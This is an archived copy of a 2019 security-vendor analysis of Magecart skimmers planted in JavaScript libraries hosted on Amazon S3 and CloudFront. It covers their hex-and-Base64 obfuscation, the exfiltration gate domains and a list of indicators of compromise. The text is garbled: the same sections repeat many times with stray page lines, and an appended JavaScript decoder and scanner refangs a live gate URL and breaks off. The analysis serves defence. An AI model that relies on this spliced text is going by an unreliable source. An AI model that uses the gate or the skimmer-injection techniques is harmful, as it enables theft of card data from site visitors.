{
	"id": "b9d2c800-08f5-4c89-b020-b4f939eb95bb",
	"created_at": "2026-04-06T00:14:53.407528Z",
	"updated_at": "2026-04-10T03:24:11.796494Z",
	"deleted_at": null,
	"sha1_hash": "a2b58817a1bb63945895f6b4d0a0afcc98e53b8b",
	"title": "Magecart skimmers found on Amazon CloudFront CDN",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1658809,
	"plain_text": "Magecart skimmers found on Amazon CloudFront CDN\r\nBy Jérôme Segura\r\nPublished: 2019-06-03 · Archived: 2026-04-05 20:45:24 UTC\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected. Our crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official NBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nInterestingly, this same library had already been altered (loading content from com) some time earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the page can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network (CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact that they were all using their own custom CDN to load various libraries. In effect, the only resulting victims of a compromise of their CDN repository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer can be seen appended to the original code, using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but in several contained within the same directory, once again part of an S3 bucket that is only used by this one website.\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom CloudFront URL.\r\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the exfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the criminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news portal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content Management Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign-up or login form instead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the CDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to valuable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the same exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent supply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another (ww1-filecloud[.]com) in an effort to disrupt the criminals’ infrastructure.\r\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple of days after the RiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160, which belongs to ASN 55933 in Hong Kong. By exploring the same subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph is that the two domains (font-assets[.]com and ww1-filecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (a server in Switzerland) came back into the hands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161. The same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but it reminds us that threat actors will look to exploit anything that is vulnerable to gain entry into systems. Sometimes, coming in through the front door might not be a viable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure. Beyond applying the same level of access control to your own CDN-hosted repositories as to your actual website, other measures—such as validation of any externally loaded content (via Subresource Integrity checks, for example)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In other cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the skimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163
The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 32 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 33 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 34 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 35 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 36 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 37 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. 
This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 38 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. 
By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 39 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. 
Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 40 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 41 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 42 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 43 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 44 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 45 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. 
A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. 
The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 46 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 47 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 48 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 49 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 50 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 51 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. 
Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 52 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 53 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. 
By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 54 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. 
Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 55 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Late last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network (CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.

Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket.

Without properly validating content loaded externally, these sites are exposing their users to various threats, including some that pilfer credit card data.
After analyzing these breaches, we found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.

The ideal place to conceal a skimmer

CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics.

The sites we identified during a crawl had nothing in common other than the fact that they were all using their own custom CDN to load various libraries. In effect, the only victim of a compromise of such a repository is that one site (and its visitors).

This first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer can be seen appended to the original code and using obfuscation to conceal itself.

This second case shows the skimmer injected not just in one library, but in several contained within the same directory, once again part of an S3 bucket that is only used by this one website.

Finally, here’s another example where the skimmer was injected in various scripts loaded from a custom CloudFront URL.

Exfiltration gate

This skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the exfiltration gate (cdn-imgcloud[.]com).
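The layered encoding just described, worked through as an added example (this is not code from the post, nor the skimmer’s own code): an encoder that applies hex and then Base64 the way the skimmer does, a decoder that peels the layers back off, and a scanner that pulls such literals out of a script and reports the ones that decode to a gate. The skimmer snippet below is constructed for the demonstration around the gate named in the post; the real sample’s code is not reproduced.

```javascript
// Added example (not the post's code): peel the hex-then-Base64 layering a
// skimmer wraps around its exfiltration gate, and pull encoded gates out of
// a JavaScript sample. The skimmer snippet below is constructed for the demo.
const PRINTABLE = /^[\t\n\r\x20-\x7e]*$/;
const LOOKS_LIKE_HOST = /^(https?:\/\/)?[a-z0-9-]+(\.[a-z0-9-]+)+(\/|$)/i;

// One decoding step. Hex is tried first because every hex string is also a
// syntactically valid Base64 string; a step only counts if it yields printable text.
function peelOnce(s) {
  if (s.length % 2 === 0 && /^[0-9a-f]+$/i.test(s)) {
    const out = Buffer.from(s, 'hex').toString('latin1');
    if (PRINTABLE.test(out)) return { text: out, layer: 'hex' };
  }
  if (s.length % 4 === 0 && /^[A-Za-z0-9+\/]+={0,2}$/.test(s)) {
    const out = Buffer.from(s, 'base64').toString('latin1');
    if (PRINTABLE.test(out)) return { text: out, layer: 'base64' };
  }
  return null;
}

// Keep peeling until nothing decodes; returns the innermost text and the layers removed.
function decodeLayers(s, maxDepth = 8) {
  const peeled = [];
  let text = s;
  for (let i = 0; i < maxDepth; i++) {
    const step = peelOnce(text);
    if (!step) break;
    peeled.push(step.layer);
    text = step.text;
  }
  return { text, peeled };
}

// The skimmer's order: hex first, then Base64 on top (so decoding peels Base64, then hex).
function encodeLayers(text) {
  const hex = Buffer.from(text, 'latin1').toString('hex');
  return Buffer.from(hex, 'latin1').toString('base64');
}

// Scan quoted string literals in a script; report those that are encoded
// and decode to a URL or hostname.
function extractGates(js) {
  const found = [];
  const literal = /(["'])([A-Za-z0-9+\/=]{16,})\1/g;
  let m;
  while ((m = literal.exec(js)) !== null) {
    const { text, peeled } = decodeLayers(m[2]);
    if (peeled.length > 0 && LOOKS_LIKE_HOST.test(text)) {
      found.push({ literal: m[2], decoded: text, peeled });
    }
  }
  return found;
}

function reportGates(js) {
  return extractGates(js).map(g => `${g.decoded}  (layers peeled: ${g.peeled.join(' then ')})`);
}

// Constructed sample: the gate named in the post (refanged), hidden the way the
// skimmer hides it, inside a form-stealing stub written for this demonstration.
const GATE = 'https://cdn-imgcloud.com/img';
const ENCODED_GATE = encodeLayers(GATE);
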